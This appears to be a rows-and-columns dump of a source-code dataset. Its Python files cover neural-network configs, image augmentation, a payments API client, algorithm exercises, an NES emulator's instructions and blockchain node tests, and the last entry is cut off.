max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
examples/source/benchmarks/googlenet_model.py | ably77/dcos-tensorflow-tools | 7 | 7800 | <reponame>ably77/dcos-tensorflow-tools
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Googlenet model configuration.
References:
Szegedy, Christian, <NAME>, <NAME>, <NAME>, <NAME>,
<NAME>, <NAME>, <NAME>, and <NAME>
Going deeper with convolutions
arXiv preprint arXiv:1409.4842 (2014)
"""
import model
class GooglenetModel(model.Model):
def __init__(self):
super(GooglenetModel, self).__init__('googlenet', 224, 32, 0.005)
def add_inference(self, cnn):
def inception_v1(cnn, k, l, m, n, p, q):
cols = [[('conv', k, 1, 1)], [('conv', l, 1, 1), ('conv', m, 3, 3)],
[('conv', n, 1, 1), ('conv', p, 5, 5)],
[('mpool', 3, 3, 1, 1, 'SAME'), ('conv', q, 1, 1)]]
cnn.inception_module('incept_v1', cols)
cnn.conv(64, 7, 7, 2, 2)
cnn.mpool(3, 3, 2, 2, mode='SAME')
cnn.conv(64, 1, 1)
cnn.conv(192, 3, 3)
cnn.mpool(3, 3, 2, 2, mode='SAME')
inception_v1(cnn, 64, 96, 128, 16, 32, 32)
inception_v1(cnn, 128, 128, 192, 32, 96, 64)
cnn.mpool(3, 3, 2, 2, mode='SAME')
inception_v1(cnn, 192, 96, 208, 16, 48, 64)
inception_v1(cnn, 160, 112, 224, 24, 64, 64)
inception_v1(cnn, 128, 128, 256, 24, 64, 64)
inception_v1(cnn, 112, 144, 288, 32, 64, 64)
inception_v1(cnn, 256, 160, 320, 32, 128, 128)
cnn.mpool(3, 3, 2, 2, mode='SAME')
inception_v1(cnn, 256, 160, 320, 32, 128, 128)
inception_v1(cnn, 384, 192, 384, 48, 128, 128)
cnn.apool(7, 7, 1, 1, mode='VALID')
cnn.reshape([-1, 1024])
| 1.890625 | 2 |
demos/prey-predator/prey_predator_abm/sim_params.py | neo-empresarial/covid-19 | 3 | 7801 | """
Simulation parameters.
"""
SIMULATION_TIME_STEPS = 300
| 0.964844 | 1 |
process_ops.py | gcosne/generative_inpainting | 11 | 7802 | <reponame>gcosne/generative_inpainting
import cv2
import numpy as np
try:
import scipy
# scipy.ndimage cannot be accessed until explicitly imported
from scipy import ndimage
except ImportError:
scipy = None
def flip_axis(x, axis):
x = np.asarray(x).swapaxes(axis, 0)
x = x[::-1, ...]
x = x.swapaxes(0, axis)
return x
def random_rotation(x, rg, row_axis=0, col_axis=1, channel_axis=2,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random rotation of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
rg: Rotation range, in degrees.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order int: order of spline interpolation.
see `ndimage.interpolation.affine_transform`
# Returns
Rotated Numpy image tensor.
"""
theta = np.random.uniform(-rg, rg)
x = apply_affine_transform(x, theta=theta, channel_axis=channel_axis,
fill_mode=fill_mode, cval=cval,
order=interpolation_order)
return x
def random_shift(x, wrg, hrg, row_axis=0, col_axis=1, channel_axis=2,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random spatial shift of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
wrg: Width shift range, as a float fraction of the width.
hrg: Height shift range, as a float fraction of the height.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order int: order of spline interpolation.
see `ndimage.interpolation.affine_transform`
# Returns
Shifted Numpy image tensor.
"""
h, w = x.shape[row_axis], x.shape[col_axis]
tx = np.random.uniform(-hrg, hrg) * h
ty = np.random.uniform(-wrg, wrg) * w
x = apply_affine_transform(x, tx=tx, ty=ty, channel_axis=channel_axis,
fill_mode=fill_mode, cval=cval,
order=interpolation_order)
return x
def random_shear(x, intensity, row_axis=0, col_axis=1, channel_axis=2,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random spatial shear of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
intensity: Transformation intensity in degrees.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order int: order of spline interpolation.
see `ndimage.interpolation.affine_transform`
# Returns
Sheared Numpy image tensor.
"""
shear = np.random.uniform(-intensity, intensity)
x = apply_affine_transform(x, shear=shear, channel_axis=channel_axis,
fill_mode=fill_mode, cval=cval,
order=interpolation_order)
return x
def random_zoom(x, zoom_range, row_axis=0, col_axis=1, channel_axis=2,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random spatial zoom of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
zoom_range: Tuple of floats; zoom range for width and height.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order int: order of spline interpolation.
see `ndimage.interpolation.affine_transform`
# Returns
Zoomed Numpy image tensor.
# Raises
ValueError: if `zoom_range` isn't a tuple.
"""
if len(zoom_range) != 2:
raise ValueError('`zoom_range` should be a tuple or list of two'
' floats. Received: %s' % (zoom_range,))
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
x = apply_affine_transform(x, zx=zx, zy=zy, channel_axis=channel_axis,
fill_mode=fill_mode, cval=cval,
order=interpolation_order)
return x
def random_channel_shift(x, intensity, channel_axis=0):
x = np.rollaxis(x, channel_axis, 0)
min_x, max_x = np.min(x), np.max(x)
channel_images = [np.clip(x_channel + np.random.uniform(-intensity, intensity), min_x, max_x)
for x_channel in x]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_axis + 1)
return x
# For curving soybean pods. L.C.Uzal
def random_curves_transform(x, strength=0.1, range=(0.,255.)):
low, high = range
delta = (high - low) * strength / 2.
xp = np.random.uniform(low=low + delta, high=high - delta)
yp = np.random.uniform(low=xp-delta, high=xp+delta)
xp = np.asarray([low, xp, high])
yp = np.asarray([low, yp, high])
return np.interp(x,xp,yp)
def transform_matrix_offset_center(matrix, x, y):
o_x = float(x) / 2 + 0.5
o_y = float(y) / 2 + 0.5
offset_matrix = np.array([[1, 0, o_x], [0, 1, o_y], [0, 0, 1]])
reset_matrix = np.array([[1, 0, -o_x], [0, 1, -o_y], [0, 0, 1]])
transform_matrix = np.dot(np.dot(offset_matrix, matrix), reset_matrix)
return transform_matrix
def apply_affine_transform(x, theta=0, tx=0, ty=0, shear=0, zx=1, zy=1,
row_axis=0, col_axis=1, channel_axis=2,
fill_mode='nearest', cval=0., order=1):
"""Applies an affine transformation specified by the parameters given.
# Arguments
x: 2D numpy array, single image.
theta: Rotation angle in degrees.
tx: Width shift.
ty: Heigh shift.
shear: Shear angle in degrees.
zx: Zoom in x direction.
zy: Zoom in y direction
row_axis: Index of axis for rows in the input image.
col_axis: Index of axis for columns in the input image.
channel_axis: Index of axis for channels in the input image.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
order int: order of interpolation
# Returns
The transformed version of the input.
"""
if scipy is None:
raise ImportError('Image transformations require SciPy. '
'Install SciPy.')
transform_matrix = None
if theta != 0:
theta = np.deg2rad(theta)
rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0],
[np.sin(theta), np.cos(theta), 0],
[0, 0, 1]])
transform_matrix = rotation_matrix
if tx != 0 or ty != 0:
shift_matrix = np.array([[1, 0, tx],
[0, 1, ty],
[0, 0, 1]])
if transform_matrix is None:
transform_matrix = shift_matrix
else:
transform_matrix = np.dot(transform_matrix, shift_matrix)
if shear != 0:
shear = np.deg2rad(shear)
shear_matrix = np.array([[1, -np.sin(shear), 0],
[0, np.cos(shear), 0],
[0, 0, 1]])
if transform_matrix is None:
transform_matrix = shear_matrix
else:
transform_matrix = np.dot(transform_matrix, shear_matrix)
if zx != 1 or zy != 1:
zoom_matrix = np.array([[zx, 0, 0],
[0, zy, 0],
[0, 0, 1]])
if transform_matrix is None:
transform_matrix = zoom_matrix
else:
transform_matrix = np.dot(transform_matrix, zoom_matrix)
if transform_matrix is not None:
h, w = x.shape[row_axis], x.shape[col_axis]
transform_matrix = transform_matrix_offset_center(
transform_matrix, h, w)
x = np.rollaxis(x, channel_axis, 0)
final_affine_matrix = transform_matrix[:2, :2]
final_offset = transform_matrix[:2, 2]
channel_images = [ndimage.interpolation.affine_transform(
x_channel,
final_affine_matrix,
final_offset,
order=order,
mode=fill_mode,
cval=cval) for x_channel in x]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_axis + 1)
return x
def random_transform(x, rotation_range=0,
width_shift_range=0.,
height_shift_range=0.,
shear_range=0.,
zoom_range=0.,
channel_shift_range=0.,
horizontal_flip=False,
vertical_flip=False,
random_curves_strength=0.):
# Generate params
if rotation_range:
theta = np.random.uniform(-rotation_range, rotation_range)
else:
theta = 0
h, w = x.shape[0], x.shape[1]
if height_shift_range:
tx = np.random.uniform(-height_shift_range, height_shift_range) * h
else:
tx = 0
if width_shift_range:
ty = np.random.uniform(-width_shift_range, width_shift_range) * w
else:
ty = 0
if shear_range:
shear = np.random.uniform(-shear_range, shear_range)
else:
shear = 0
if np.isscalar(zoom_range):
zoom_range = [1 - zoom_range, 1 + zoom_range]
elif len(zoom_range) == 2:
zoom_range = [zoom_range[0], zoom_range[1]]
else:
raise ValueError('`zoom_range` should be a float or '
'a tuple or list of two floats. '
'Received arg: ', zoom_range)
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
# Apply transforms
x = apply_affine_transform(x,
theta,
tx, ty,
shear,
zx, zy)
if channel_shift_range != 0:
x = random_channel_shift(x, channel_shift_range, 2)
if horizontal_flip:
if np.random.random() < 0.5:
x = flip_axis(x, 1)
if vertical_flip:
if np.random.random() < 0.5:
x = flip_axis(x, 0)
if random_curves_strength > 0.:
x = random_curves_transform(x, random_curves_strength)
return x
if __name__ == "__main__":
import argparse
from PIL import Image
parser = argparse.ArgumentParser()
parser.add_argument('--image', default='', type=str)
parser.add_argument('--imageOut', default='result.png', type=str)
args = parser.parse_args()
im = np.array(Image.open(args.image))
img = random_transform(im, rotation_range=10, shear_range=.5, zoom_range=.2, channel_shift_range=10., horizontal_flip=True)
Image.fromarray(np.uint8(img)).save(args.imageOut)
| 2.59375 | 3 |
keystone/tests/unit/token/test_provider.py | maestro-hybrid-cloud/keystone | 0 | 7803 | <filename>keystone/tests/unit/token/test_provider.py
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from six.moves import urllib
from keystone.tests import unit
from keystone.token import provider
class TestRandomStrings(unit.BaseTestCase):
def test_strings_are_url_safe(self):
s = provider.random_urlsafe_str()
self.assertEqual(s, urllib.parse.quote_plus(s))
def test_strings_can_be_converted_to_bytes(self):
s = provider.random_urlsafe_str()
self.assertTrue(isinstance(s, six.string_types))
b = provider.random_urlsafe_str_to_bytes(s)
self.assertTrue(isinstance(b, bytes))
| 2.046875 | 2 |
fasm2bels/database/connection_db_utils.py | mithro/symbiflow-xc-fasm2bels | 0 | 7804 | import functools
def create_maybe_get_wire(conn):
c = conn.cursor()
@functools.lru_cache(maxsize=None)
def get_tile_type_pkey(tile):
c.execute('SELECT pkey, tile_type_pkey FROM phy_tile WHERE name = ?',
(tile, ))
return c.fetchone()
@functools.lru_cache(maxsize=None)
def maybe_get_wire(tile, wire):
phy_tile_pkey, tile_type_pkey = get_tile_type_pkey(tile)
c.execute(
'SELECT pkey FROM wire_in_tile WHERE phy_tile_type_pkey = ? and name = ?',
(tile_type_pkey, wire))
result = c.fetchone()
if result is None:
return None
wire_in_tile_pkey = result[0]
c.execute(
'SELECT pkey FROM wire WHERE phy_tile_pkey = ? AND wire_in_tile_pkey = ?',
(phy_tile_pkey, wire_in_tile_pkey))
return c.fetchone()[0]
return maybe_get_wire
def maybe_add_pip(top, maybe_get_wire, feature):
if feature.value != 1:
return
parts = feature.feature.split('.')
assert len(parts) == 3
sink_wire = maybe_get_wire(parts[0], parts[2])
if sink_wire is None:
return
src_wire = maybe_get_wire(parts[0], parts[1])
if src_wire is None:
return
top.active_pips.add((sink_wire, src_wire))
def get_node_pkey(conn, wire_pkey):
c = conn.cursor()
c.execute("SELECT node_pkey FROM wire WHERE pkey = ?", (wire_pkey, ))
return c.fetchone()[0]
def get_wires_in_node(conn, node_pkey):
c = conn.cursor()
c.execute("SELECT pkey FROM wire WHERE node_pkey = ?", (node_pkey, ))
for row in c.fetchall():
yield row[0]
def get_wire(conn, phy_tile_pkey, wire_in_tile_pkey):
c = conn.cursor()
c.execute(
"SELECT pkey FROM wire WHERE wire_in_tile_pkey = ? AND phy_tile_pkey = ?;",
(
wire_in_tile_pkey,
phy_tile_pkey,
))
return c.fetchone()[0]
def get_tile_type(conn, tile_name):
c = conn.cursor()
c.execute(
"""
SELECT name FROM tile_type WHERE pkey = (
SELECT tile_type_pkey FROM phy_tile WHERE name = ?);""", (tile_name, ))
return c.fetchone()[0]
def get_wire_pkey(conn, tile_name, wire):
c = conn.cursor()
c.execute(
"""
WITH selected_tile(phy_tile_pkey, tile_type_pkey) AS (
SELECT
pkey,
tile_type_pkey
FROM
phy_tile
WHERE
name = ?
)
SELECT
wire.pkey
FROM
wire
WHERE
wire.phy_tile_pkey = (
SELECT
selected_tile.phy_tile_pkey
FROM
selected_tile
)
AND wire.wire_in_tile_pkey = (
SELECT
wire_in_tile.pkey
FROM
wire_in_tile
WHERE
wire_in_tile.name = ?
AND wire_in_tile.phy_tile_type_pkey = (
SELECT
tile_type_pkey
FROM
selected_tile
)
);
""", (tile_name, wire))
results = c.fetchone()
assert results is not None, (tile_name, wire)
return results[0]
| 2.28125 | 2 |
ppr-api/src/services/payment_service.py | bcgov/ppr-deprecated | 1 | 7805 | """A module that provides functionality for accessing the Payments API."""
import enum
import http
import logging
import requests
from fastapi import Depends, Header, HTTPException
from fastapi.security.http import HTTPAuthorizationCredentials
import auth.authentication
import config
import schemas.payment
logger = logging.getLogger(__name__)
CORP_TYPE = 'PPR'
class FilingCode(enum.Enum):
"""An enumeration of the filing codes available to PPR."""
SEARCH = 'SERCH'
YEARLY_REGISTRATION = 'FSREG'
INFINITE_REGISTRATION = 'INFRG'
class PaymentService:
"""A service used for interacting with the Payments API."""
auth_header: HTTPAuthorizationCredentials
account_id: str
def __init__(self, auth_header: HTTPAuthorizationCredentials = Depends(auth.authentication.bearer_scheme),
account_id: str = Header(None)):
"""Initialize the repository with the Authorization and Account-Id headers provided in the request."""
self.auth_header = auth_header
self.account_id = account_id
def create_payment(self, filing_code: FilingCode):
"""Submit a payment request and provide the details to the caller."""
request = {
'businessInfo': {'corpType': CORP_TYPE},
'filingInfo': {'filingTypes': [{'filingTypeCode': filing_code.value}]}
}
pay_response = requests.post(
'{}/payment-requests'.format(config.PAY_API_URL), json=request,
headers={
'Authorization': '{} {}'.format(self.auth_header.scheme, self.auth_header.credentials),
'Account-Id': self.account_id
}
)
try:
auth.authentication.check_auth_response(pay_response)
except HTTPException as auth_ex:
logger.error('Create Payment call failed auth with status {}. Response body: {}'.format(
pay_response.status_code, pay_response.text))
raise auth_ex
if not pay_response: # status_code is unsuccessful
logger.error('Create Payment call failed unexpectedly with status {}. Response body: {}'.format(
pay_response.status_code, pay_response.text))
raise HTTPException(status_code=http.HTTPStatus.INTERNAL_SERVER_ERROR)
body = pay_response.json()
return schemas.payment.Payment(id=body['id'], status=body['statusCode'], method=body['paymentMethod'])
| 3.125 | 3 |
SmerekaRoman/HW_6/HW 6.3.py | kolyasalubov/Lv-639.pythonCore | 0 | 7806 | <reponame>kolyasalubov/Lv-639.pythonCore
def numb_of_char(a):
d = {}
for char in set(a):
d[char] = a.count(char)
return d
a = numb_of_char(str(input("Input the word please: ")))
print(a)
| 3.5625 | 4 |
0201-0300/0251-Flatten 2D Vector/0251-Flatten 2D Vector.py | jiadaizhao/LeetCode | 49 | 7807 | <reponame>jiadaizhao/LeetCode
class Vector2D:
def __init__(self, v: List[List[int]]):
def getIt():
for row in v:
for val in row:
yield val
self.it = iter(getIt())
self.val = next(self.it, None)
def next(self) -> int:
result = self.val
self.val = next(self.it, None)
return result
def hasNext(self) -> bool:
return self.val is not None
# Your Vector2D object will be instantiated and called as such:
# obj = Vector2D(v)
# param_1 = obj.next()
# param_2 = obj.hasNext()
| 3.40625 | 3 |
logger_decorator.py | jbhayback/reconciliation-manager | 0 | 7808 | from datetime import datetime
import inspect
def log_time(msg=None):
def decorator(f):
nonlocal msg
if msg is None:
msg = '{} time spent: '.format(f.__name__)
def inner(*args, **kwargs):
# check if the object has a logger
global logger
if args and hasattr(args[0], 'logger'):
logger = args[0].logger
start = datetime.now()
result = f(*args, **kwargs)
logger.info(
msg + ' {} seconds'.format((datetime.now() - start).total_seconds())
)
return result
return inner
return decorator
def log_params(f):
arg_spec = inspect.getargspec(f).args
has_self = arg_spec and arg_spec[0] == 'self'
def decorator(*args, **kwargs):
logger.info(
'calling {} with args: {}, and kwargs: {}'.format(
f.__name__, args if not has_self else args[1:], kwargs
)
)
return f(*args, **kwargs)
return decorator
| 2.9375 | 3 |
lf3py/di/__init__.py | rog-works/lf3py | 0 | 7809 | <gh_stars>0
from lf3py.di.di import DI # noqa F401
| 1.109375 | 1 |
critical/tasks.py | lenarother/django-critical-css | 2 | 7810 | <reponame>lenarother/django-critical-css
import logging
from django.utils.safestring import mark_safe
from django_rq import job
from inline_static.css import transform_css_urls
logger = logging.getLogger(__name__)
@job
def calculate_critical_css(critical_id, original_path):
from .exceptions import CriticalException
from .models import Critical
from .services import calculate_critical_css as service_calculate
logger.info('Task: critical css with id {0} requested.'.format(critical_id))
critical = Critical.objects.filter(id=critical_id).first()
if not critical:
raise CriticalException('There is no Critical object with id {0}'.format(critical_id))
logger.info('Task: {0}, {1}'.format(critical.url, critical.path))
critical.is_pending = True
critical.save(update_fields=['is_pending'])
logger.info('Task: critical css with id {0} pending.'.format(critical_id))
try:
critical_css_raw = service_calculate(critical.url, critical.path)
critical_css = transform_css_urls(original_path, critical.path, critical_css_raw)
except Exception as exc:
critical.is_pending = False
critical.save(update_fields=['is_pending'])
raise CriticalException('Could not calculate critical css') from exc
critical.css = mark_safe(critical_css)
critical.is_pending = False
critical.save()
logger.info('Task: critical css with id {0} saved.'.format(critical_id))
| 1.921875 | 2 |
test.py | wei2912/bce-simulation | 0 | 7811 | <filename>test.py<gh_stars>0
#!/usr/bin/env python
# coding=utf-8
"""
This script tests the simulations of the experiments.
"""
import math
from utils import coin_var, needle_var
def main():
needle_var_vals = [
(1.1, 1.0),
(1.4, 1.0),
(2.0, 1.0),
(2.9, 1.0),
(3.3, 1.0),
(5.0, 1.0)
]
print("needle_var:")
for L, D in needle_var_vals:
trials = 1000000
pred_prob = needle_var.predict_prob(length=L, gap_width=D)
pred_hits = pred_prob * trials
hits = needle_var.run_trials(length=L, gap_width=D, trials=trials)
if pred_hits == 0 or pred_hits == trials:
stat = float('nan')
else:
stat = sum([
(hits - pred_hits) ** 2 / pred_hits,
((trials - hits) - (trials - pred_hits)) ** 2 / (trials-pred_hits)
])
print("L = {}, D = {}, expected = {}, observed = {}, stat = {}".format(L, D, pred_hits, hits, stat))
print("coin_var:")
coin_var_vals = [
(1.0, 1.0),
(1.0, 1.2),
(1.0, math.sqrt(2)),
(1.0, 1.5),
(1.0, 1.8),
(1.0, 1.9),
(1.0, 2.0),
(1.0, 3.0),
(1.0, 5.0)
]
for R, D in coin_var_vals:
trials = 100000
pred_prob = coin_var.predict_prob(diameter=2*R, gap_width=D)
pred_hits = pred_prob * trials
hits = coin_var.run_trials(diameter=2*R, gap_width=D, trials=trials)
if pred_hits == 0 or pred_hits == trials:
stat = float('nan')
else:
stat = sum([
(hits - pred_hits) ** 2 / pred_hits,
((trials - hits) - (trials - pred_hits)) ** 2 / (trials-pred_hits)
])
print("R = {}, D = {}, expected = {}, observed = {}, stat = {}".format(R, D, pred_hits, hits, stat))
main()
| 2.75 | 3 |
instructions/instructions.py | fernandozanutto/PyNES | 0 | 7812 | <reponame>fernandozanutto/PyNES
from addressing import *
from instructions.base_instructions import SetBit, ClearBit
from instructions.generic_instructions import Instruction
from status import Status
# set status instructions
class Sec(SetBit):
identifier_byte = bytes([0x38])
bit = Status.StatusTypes.carry
class Sei(SetBit):
identifier_byte = bytes([0x78])
bit = Status.StatusTypes.interrupt
class Sed(SetBit):
identifier_byte = bytes([0xF8])
bit = Status.StatusTypes.decimal
# clear status instructions
class Cld(ClearBit):
identifier_byte = bytes([0xD8])
bit = Status.StatusTypes.decimal
class Clc(ClearBit):
identifier_byte = bytes([0x18])
bit = Status.StatusTypes.carry
class Clv(ClearBit):
identifier_byte = bytes([0xB8])
bit = Status.StatusTypes.overflow
class Cli(ClearBit):
identifier_byte = bytes([0x58])
bit = Status.StatusTypes.interrupt
class Bit(Instruction):
@classmethod
def get_data(cls, cpu, memory_address, data_bytes) -> Optional[int]:
return cpu.bus.read_memory(memory_address)
@classmethod
def apply_side_effects(cls, cpu, memory_address, value):
and_result = cpu.a_reg & value
cpu.status_reg.bits[Status.StatusTypes.zero] = not and_result
cpu.status_reg.bits[Status.StatusTypes.overflow] = (
value & (1 << 6)) > 0
cpu.status_reg.bits[Status.StatusTypes.negative] = (
value & (1 << 7)) > 0
class BitZeroPage(ZeroPageAddressing, Bit):
identifier_byte = bytes([0x24])
class BitAbsolute(AbsoluteAddressing, Bit):
identifier_byte = bytes([0x2C])
class Brk(ImplicitAddressing, Instruction):
identifier_byte = bytes([0x00])
@classmethod
def get_data(cls, cpu, memory_address, data_bytes) -> Optional[int]:
return super().get_data(cpu, memory_address, data_bytes)
@classmethod
def write(cls, cpu, memory_address, value):
cpu.push_to_stack(cpu.pc_reg + 1, 2)
cpu.push_to_stack(cpu.status_reg.to_int() | (1 << 4), 1)
@classmethod
def apply_side_effects(cls, cpu, memory_address, value):
cpu.status_reg.bits[Status.StatusTypes.interrupt] = 1
cpu.running = False
@classmethod
def get_cycles(cls):
return 7
| 2.71875 | 3 |
python/530.minimum-absolute-difference-in-bst.py | vermouth1992/Leetcode | 0 | 7813 | #
# @lc app=leetcode id=530 lang=python3
#
# [530] Minimum Absolute Difference in BST
#
# https://leetcode.com/problems/minimum-absolute-difference-in-bst/description/
#
# algorithms
# Easy (55.23%)
# Total Accepted: 115.5K
# Total Submissions: 209K
# Testcase Example: '[4,2,6,1,3]'
#
# Given the root of a Binary Search Tree (BST), return the minimum absolute
# difference between the values of any two different nodes in the tree.
#
#
# Example 1:
#
#
# Input: root = [4,2,6,1,3]
# Output: 1
#
#
# Example 2:
#
#
# Input: root = [1,0,48,null,null,12,49]
# Output: 1
#
#
#
# Constraints:
#
#
# The number of nodes in the tree is in the range [2, 10^4].
# 0 <= Node.val <= 10^5
#
#
#
# Note: This question is the same as 783:
# https://leetcode.com/problems/minimum-distance-between-bst-nodes/
#
#
# Definition for a binary tree node.
from typing import List
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def getNodeValues(self, root: TreeNode) -> List[int]:
value = []
self.getNodeValuesHelper(root, value)
return value
def getNodeValuesHelper(self, root: TreeNode, value: List[int]):
if root is None:
return
value.append(root.val)
self.getNodeValuesHelper(root.left, value)
self.getNodeValuesHelper(root.right, value)
def getMinimumDifference(self, root: TreeNode) -> int:
# get all the values and put into a list O(n)
value = self.getNodeValues(root)
# sort the list O(nlogn)
value = sorted(value)
# find the minimum difference between ajacent values O(n)
min_abs_diff = abs(value[0] - value[1])
for i in range(1, len(value) - 1):
diff = abs(value[i] - value[i + 1])
if diff < min_abs_diff:
min_abs_diff = diff
return min_abs_diff
| 3.796875 | 4 |
tensorflow/python/eager/remote_cloud_tpu_test.py | abhaikollara/tensorflow | 26 | 7814 | <reponame>abhaikollara/tensorflow<filename>tensorflow/python/eager/remote_cloud_tpu_test.py<gh_stars>10-100
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test that we can connect to a real Cloud TPU."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import flags
from absl.testing import absltest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.eager import context
from tensorflow.python.eager import remote
from tensorflow.python.tpu import tpu_strategy_util
FLAGS = flags.FLAGS
flags.DEFINE_string('tpu', '', 'Name of TPU to connect to.')
flags.DEFINE_string('project', None, 'Name of GCP project with TPU.')
flags.DEFINE_string('zone', None, 'Name of GCP zone with TPU.')
EXPECTED_DEVICES_PRE_CONNECT = [
'/job:localhost/replica:0/task:0/device:CPU:0',
'/job:localhost/replica:0/task:0/device:XLA_CPU:0'
]
EXPECTED_DEVICES_AFTER_CONNECT = [
'/job:localhost/replica:0/task:0/device:CPU:0',
'/job:localhost/replica:0/task:0/device:XLA_CPU:0',
'/job:worker/replica:0/task:0/device:CPU:0',
'/job:worker/replica:0/task:0/device:XLA_CPU:0',
'/job:worker/replica:0/task:0/device:TPU_SYSTEM:0',
'/job:worker/replica:0/task:0/device:TPU:0',
'/job:worker/replica:0/task:0/device:TPU:1',
'/job:worker/replica:0/task:0/device:TPU:2',
'/job:worker/replica:0/task:0/device:TPU:3',
'/job:worker/replica:0/task:0/device:TPU:4',
'/job:worker/replica:0/task:0/device:TPU:5',
'/job:worker/replica:0/task:0/device:TPU:6',
'/job:worker/replica:0/task:0/device:TPU:7',
]
class RemoteCloudTPUTest(absltest.TestCase):
"""Test that we can connect to a real Cloud TPU."""
def test_connect(self):
self.assertCountEqual(
EXPECTED_DEVICES_PRE_CONNECT,
context.list_devices())
resolver = tpu_cluster_resolver.TPUClusterResolver(
tpu=FLAGS.tpu, zone=FLAGS.zone, project=FLAGS.project
)
remote.connect_to_cluster(resolver)
self.assertCountEqual(
EXPECTED_DEVICES_AFTER_CONNECT,
context.list_devices())
tpu_strategy_util.initialize_tpu_system(resolver)
if __name__ == '__main__':
absltest.main()
| 1.820313 | 2 |
test/functional/bsv-blocksize-params.py | gbtn/bitcoin-sv-gbtn | 3 | 7815 | #!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
Test that the blockmaxsize and excessiveblocksize parameters are also
settable via the bitcoin.conf file.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
from test_framework.cdefs import (ONE_MEGABYTE)
import os
class BSVBlockSizeParams(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.maxminedblocksize = 4 * ONE_MEGABYTE
self.maxblocksize = 16 * ONE_MEGABYTE
def setup_chain(self):
super().setup_chain()
with open(os.path.join(self.options.tmpdir + "/node0", "bitcoin.conf"), 'a', encoding='utf8') as f:
f.write("blockmaxsize=" + str(self.maxminedblocksize) + "\n")
f.write("excessiveblocksize=" + str(self.maxblocksize) + "\n")
def add_options(self, parser):
super().add_options(parser)
def run_test(self):
gires = self.nodes[0].getinfo()
assert_equal(gires["maxblocksize"], self.maxblocksize)
assert_equal(gires["maxminedblocksize"], self.maxminedblocksize)
if __name__ == '__main__':
BSVBlockSizeParams().main()
| 2.21875 | 2 |
yotta/test/cli/outdated.py | headlessme/yotta | 0 | 7816 | <reponame>headlessme/yotta
#!/usr/bin/env python
